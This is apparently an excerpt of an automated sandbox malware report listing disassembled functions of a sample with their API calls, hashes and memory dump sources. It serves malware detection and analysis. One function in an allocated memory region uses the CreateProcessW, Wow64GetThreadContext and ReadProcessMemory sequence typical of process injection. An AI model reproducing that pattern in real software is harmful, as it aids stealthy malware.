                                                          • Instruction ID: 969df93d77d412b7db952ec52da243ccf413715086107706658318eb2d673ce3
                                                          • Opcode Fuzzy Hash: 019bc84b8cadfdf9b893be0f94ed861fd07299f87610093a39b46c5452f91d7d
                                                          • Instruction Fuzzy Hash: D5E08632140214BBDB232B54EC09FDA7B1DEB45760F148225FB54B90E087B129119798
                                                          Function 003A8DB6 Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • _free.LIBCMT ref: 003A8DC4
                                                            • Part of subcall function 00362ED5: RtlFreeHeap.NTDLL(00000000,00000000,?,00369BA4), ref: 00362EE9
                                                            • Part of subcall function 00362ED5: GetLastError.KERNEL32(00000000,?,00369BA4), ref: 00362EFB
                                                          • _free.LIBCMT ref: 003A8DD5
                                                          • _free.LIBCMT ref: 003A8DE7
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast
                                                          • String ID:
                                                          • API String ID: 776569668-0
                                                          • Opcode ID: 3221efda5ec1aeb3564d3aaca8a62a8878e7642d45a62f0f0d26450024f2f6e1
                                                          • Instruction ID: 1117deaa540571fb48329829a8f6e6feac4276e6b030d060c2e05c1bce8606f8
                                                          • Opcode Fuzzy Hash: 3221efda5ec1aeb3564d3aaca8a62a8878e7642d45a62f0f0d26450024f2f6e1
                                                          • Instruction Fuzzy Hash: BBE05EE1701B0183DA26A77CAD44E9333ECDF99765B160C2EF40ADB5C6CE24F8818138
                                                          Function 0034AB23 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: CALL
                                                          • API String ID: 0-4196123274
                                                          • Opcode ID: aa9e47bed732e4153b33c92876f26ebd7585505211de83d26cfd424fea47f41b
                                                          • Instruction ID: 7166ba7c4acf2e601120d7a815ee3a1cc408dbe9d47a436dcd247ca61c3ca931
                                                          • Opcode Fuzzy Hash: aa9e47bed732e4153b33c92876f26ebd7585505211de83d26cfd424fea47f41b
                                                          • Instruction Fuzzy Hash: 94223770508701CFCB2ADF24C491B2ABBE5BF85304F15896DE89A9F662D735EC45CB82
                                                          Function 00347BB1 Relevance: 3.1, APIs: 2, Instructions: 97COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: _memmove
                                                          • String ID:
                                                          • API String ID: 4104443479-0
                                                          • Opcode ID: e7d2d49602d2794d161de5c513f13cf70984f02b9fc362fedd43b39a6bdced4a
                                                          • Instruction ID: 7c69b6be975f1570c4660c23c11c38454ab09b7986eaed69460b1d9075afc964
                                                          • Opcode Fuzzy Hash: e7d2d49602d2794d161de5c513f13cf70984f02b9fc362fedd43b39a6bdced4a
                                                          • Instruction Fuzzy Hash: 6731B1B1604606AFC715DF28D9D1E6AB3E8FF483207158629E419CF691DB70FC10CB90
                                                          Function 0034492E Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • IsThemeActive.UXTHEME ref: 00344992
                                                            • Part of subcall function 003634EC: __lock.LIBCMT ref: 003634F2
                                                            • Part of subcall function 003634EC: DecodePointer.KERNEL32(00000001,?,003449A7,00397F9C), ref: 003634FE
                                                            • Part of subcall function 003634EC: EncodePointer.KERNEL32(?,?,003449A7,00397F9C), ref: 00363509
                                                            • Part of subcall function 00344A5B: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00344A73
                                                            • Part of subcall function 00344A5B: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00344A88
                                                            • Part of subcall function 00343B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00343B7A
                                                            • Part of subcall function 00343B4C: IsDebuggerPresent.KERNEL32 ref: 00343B8C
                                                            • Part of subcall function 00343B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,004052F8,004052E0,?,?), ref: 00343BFD
                                                            • Part of subcall function 00343B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 00343C81
                                                          • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 003449D2
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                          • String ID:
                                                          • API String ID: 1438897964-0
                                                          • Opcode ID: b9ec9f0f92bbfc27d4cd193746ba9fb747e4cc61afe21011e99d7f0037d4fb5f
                                                          • Instruction ID: 485f3e04b2f8200d4dfdb5ef3e70f9ed200a87f8719134519c3815f3eb527fd7
                                                          • Opcode Fuzzy Hash: b9ec9f0f92bbfc27d4cd193746ba9fb747e4cc61afe21011e99d7f0037d4fb5f
                                                          • Instruction Fuzzy Hash: 87118C718143159FC702DF29D945A0BFFE8EF84710F00852EF045AB2A1DB70A958CF9A
                                                          Function 00360F36 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 0036588C: __FF_MSGBANNER.LIBCMT ref: 003658A3
                                                            • Part of subcall function 0036588C: __NMSG_WRITE.LIBCMT ref: 003658AA
                                                            • Part of subcall function 0036588C: RtlAllocateHeap.NTDLL(01730000,00000000,00000001,00000000,?,?,?,00360F53,?), ref: 003658CF
                                                          • std::exception::exception.LIBCMT ref: 00360F6C
                                                          • __CxxThrowException@8.LIBCMT ref: 00360F81
                                                            • Part of subcall function 0036871B: RaiseException.KERNEL32(?,?,?,003F9E78,00000000,?,?,?,?,00360F86,?,003F9E78,?,00000001), ref: 00368770
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                          • String ID:
                                                          • API String ID: 3902256705-0
                                                          • Opcode ID: e08cac8acadfddac0950dd7fa055a2a1cddf95d4a5058e84ad8c7378936a549b
                                                          • Instruction ID: e1199f4d02a58ecf5ac446a5e69ee29e646e1e905c7ff534c070aa77f8d6a87d
                                                          • Opcode Fuzzy Hash: e08cac8acadfddac0950dd7fa055a2a1cddf95d4a5058e84ad8c7378936a549b
                                                          • Instruction Fuzzy Hash: 96F02D7550420D66C72BBB94EC029DF7B9CDF10310F108526FD049E286DFB08A50C2D1
                                                          Function 00365516 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00368CA8: __getptd_noexit.LIBCMT ref: 00368CA8
                                                          • __lock_file.LIBCMT ref: 0036555B
                                                            • Part of subcall function 00366D8E: __lock.LIBCMT ref: 00366DB1
                                                          • __fclose_nolock.LIBCMT ref: 00365566
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                          • String ID:
                                                          • API String ID: 2800547568-0
                                                          • Opcode ID: a0664185684e78c87cec396f4b3633171a703a6357a5d873e131d139a652a7bb
                                                          • Instruction ID: 5496560ef1e20976e17d72e382451838602a40c961a9550fce6c2c9970464e1d
                                                          • Opcode Fuzzy Hash: a0664185684e78c87cec396f4b3633171a703a6357a5d873e131d139a652a7bb
                                                          • Instruction Fuzzy Hash: A4F0B471901B059BD713AF7A880ABAE67A26F42331F15C319F517AF1C9CF7C49019B62
                                                          Function 024E129D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateProcessW.KERNELBASE(?,00000000), ref: 024E1A5B
                                                          • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 024E1AF1
                                                          • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 024E1B13
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304979250.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_24e0000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                          • String ID:
                                                          • API String ID: 2438371351-0
                                                          • Opcode ID: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                                                          • Instruction ID: ca8fa49619fd81047e1b529a0fe54354d755c2b5c96c7a2c55e3e6795a101f3b
                                                          • Opcode Fuzzy Hash: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                                                          • Instruction Fuzzy Hash: 5712CD24E24658C6EB24DF64D8507DEB232EF68301F1090E9910DEB7A5E77A4F81CF5A
                                                          Function 00380005 Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: ClearVariant
                                                          • String ID:
                                                          • API String ID: 1473721057-0
                                                          • Opcode ID: 3939b7a52f8be546297366841c58e8db066dd1d967b391fb82647a7e5341f5b0
                                                          • Instruction ID: 1e3361b225a702f541129caaf6aa5b6d85e80db8e6b425395224b63136c0e59b
                                                          • Opcode Fuzzy Hash: 3939b7a52f8be546297366841c58e8db066dd1d967b391fb82647a7e5341f5b0
                                                          • Instruction Fuzzy Hash: 494125745087418FDB26DF14C494B1ABBE0BF45318F0A88ACE8999F762C732F849CB42
                                                          Function 00347CB3 Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: _memmove
                                                          • String ID:
                                                          • API String ID: 4104443479-0
                                                          • Opcode ID: f790de36aa46022a2a0980986bfcace91817953cbf8ef9931aae8720dfcafdf4
                                                          • Instruction ID: b9e0de1cf6a06c5864ed07d26527fe766de711e7b68ae577887031941cd99b18
                                                          • Opcode Fuzzy Hash: f790de36aa46022a2a0980986bfcace91817953cbf8ef9931aae8720dfcafdf4
                                                          • Instruction Fuzzy Hash: 5521F172614A09EBDB268F25EC81B7A7BF8FF14350F22C46EE44AC9591EB3094D0D754
                                                          Function 00344F3D Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00344D13: FreeLibrary.KERNEL32(00000000,?), ref: 00344D4D
                                                            • Part of subcall function 003653CB: __wfsopen.LIBCMT ref: 003653D6
                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,004052F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00344F6F
                                                            • Part of subcall function 00344CC8: FreeLibrary.KERNEL32(00000000), ref: 00344D02
                                                            • Part of subcall function 00344DD0: _memmove.LIBCMT ref: 00344E1A
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Library$Free$Load__wfsopen_memmove
                                                          • String ID:
                                                          • API String ID: 1396898556-0
                                                          • Opcode ID: 941734f40d3759cf2b6a83513357526fa2b77798e73f05228f89debe02ece9c3
                                                          • Instruction ID: 63506e69269f28a37b158d7adde399d2aec3c753797fe0e0cfc1dcbeed921119
                                                          • Opcode Fuzzy Hash: 941734f40d3759cf2b6a83513357526fa2b77798e73f05228f89debe02ece9c3
                                                          • Instruction Fuzzy Hash: B811E731B00606ABDF23AF70CC52FAE77E9DF44B00F108839F541AE182DA75AE059750
                                                          Function 003800DE Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: ClearVariant
                                                          • String ID:
                                                          • API String ID: 1473721057-0
                                                          • Opcode ID: a69c211564c5b5b34c93734965d43cde4af549a9834768fe0491c75a5ec22d95
                                                          • Instruction ID: bf384a05ec3f8faf08b27af7ab37fdc3d9ccc8cd0fd63436247d7571215884c6
                                                          • Opcode Fuzzy Hash: a69c211564c5b5b34c93734965d43cde4af549a9834768fe0491c75a5ec22d95
                                                          • Instruction Fuzzy Hash: 11212274508301CFCB2ADF14C444A1BBBE5BF88314F0589A8E8965B721C731F849CB92
                                                          Function 003649D3 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __lock_file.LIBCMT ref: 00364A16
                                                            • Part of subcall function 00368CA8: __getptd_noexit.LIBCMT ref: 00368CA8
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: __getptd_noexit__lock_file
                                                          • String ID:
                                                          • API String ID: 2597487223-0
                                                          • Opcode ID: 40d2c16ea6ea7e8d88ce9209e61bc2706b4593312607ec3e19e00a92b49517a6
                                                          • Instruction ID: 99bb8382a52fd5ab18c4176c2686254a820c11587bf31333e474f4965faca096
                                                          • Opcode Fuzzy Hash: 40d2c16ea6ea7e8d88ce9209e61bc2706b4593312607ec3e19e00a92b49517a6
                                                          • Instruction Fuzzy Hash: E9F0AF31D40245ABDF13AFA4CC067EE76A1AF00325F05C618F824AF199DBB88910DF55
                                                          Function 00344FAA Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • FreeLibrary.KERNEL32(?,?,004052F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00344FDE
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: FreeLibrary
                                                          • String ID:
                                                          • API String ID: 3664257935-0
                                                          • Opcode ID: 6b0536c028131fb64638057a333ff9fc5fdc85e7a005ce21e358b5ad745ce4aa
                                                          • Instruction ID: 1504ba7b24834bcb6dd8ee95454baecc7351b01c72610406dbbb338b0cbb4420
                                                          • Opcode Fuzzy Hash: 6b0536c028131fb64638057a333ff9fc5fdc85e7a005ce21e358b5ad745ce4aa
                                                          • Instruction Fuzzy Hash: 0DF039B1105712CFCB369F64E494912BBE5BF043293258A3EE5D78AA10C731B848DF40
                                                          Function 00360911 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00360930
                                                            • Part of subcall function 00347D2C: _memmove.LIBCMT ref: 00347D66
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: LongNamePath_memmove
                                                          • String ID:
                                                          • API String ID: 2514874351-0
                                                          • Opcode ID: fc2a544187d456d603094a04b3e0564f9a01aae2920a82bc74eab16a5f97193b
                                                          • Instruction ID: f921e56252210d498b60c8ee643dbce67cf4c4bfc0d6ecab4f3d277d068e6d60
                                                          • Opcode Fuzzy Hash: fc2a544187d456d603094a04b3e0564f9a01aae2920a82bc74eab16a5f97193b
                                                          • Instruction Fuzzy Hash: 19E0CD3B9051285BC721D65C9C05FFA77EDDF89790F0441B5FC0CDB204D9646C818790
                                                          Function 003653CB Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: __wfsopen
                                                          • String ID:
                                                          • API String ID: 197181222-0
                                                          • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                          • Instruction ID: 444eee67944bb1b73f28c741f4787745de450bc42231fc4a79390e356aae98da
                                                          • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                          • Instruction Fuzzy Hash: 49B0927A48020C77CE022A82EC02B493B599B40BA4F408021FB0C1C2A2AAB3A6609689
                                                          Function 00360D88 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID:
                                                          • API String ID: 4275171209-0
                                                          • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                          • Instruction ID: 4108b58569ecdd39fa91ba41a6ad7bd15157c6f46ab9cdffe02b5cd0cd9a28ad
                                                          • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                          • Instruction Fuzzy Hash: 3F31D374A00505DBC71EDF58C48296AFBA6FF49300B69CAA5E40ACB759DB31EDD1CB80
                                                          Function 024E22A0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • Sleep.KERNELBASE(000001F4), ref: 024E22B1
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304979250.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_24e0000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID:
                                                          • API String ID: 3472027048-0
                                                          • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                          • Instruction ID: 8a53aab71cacfcd46e5845fa36393e8836f4180f30f2d0df875cc8cff2fb6ce9
                                                          • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                          • Instruction Fuzzy Hash: 1BE0E67494010EDFDB00EFB4D64969E7FB4EF04302F1001A1FD01D2280D6709D508A72

                                                          Non-executed Functions

                                                          Function 003CCB26 Relevance: 75.9, APIs: 40, Strings: 3, Instructions: 632windowkeyboardCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00342612: GetWindowLongW.USER32(?,000000EB), ref: 00342623
                                                          • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 003CCBA1
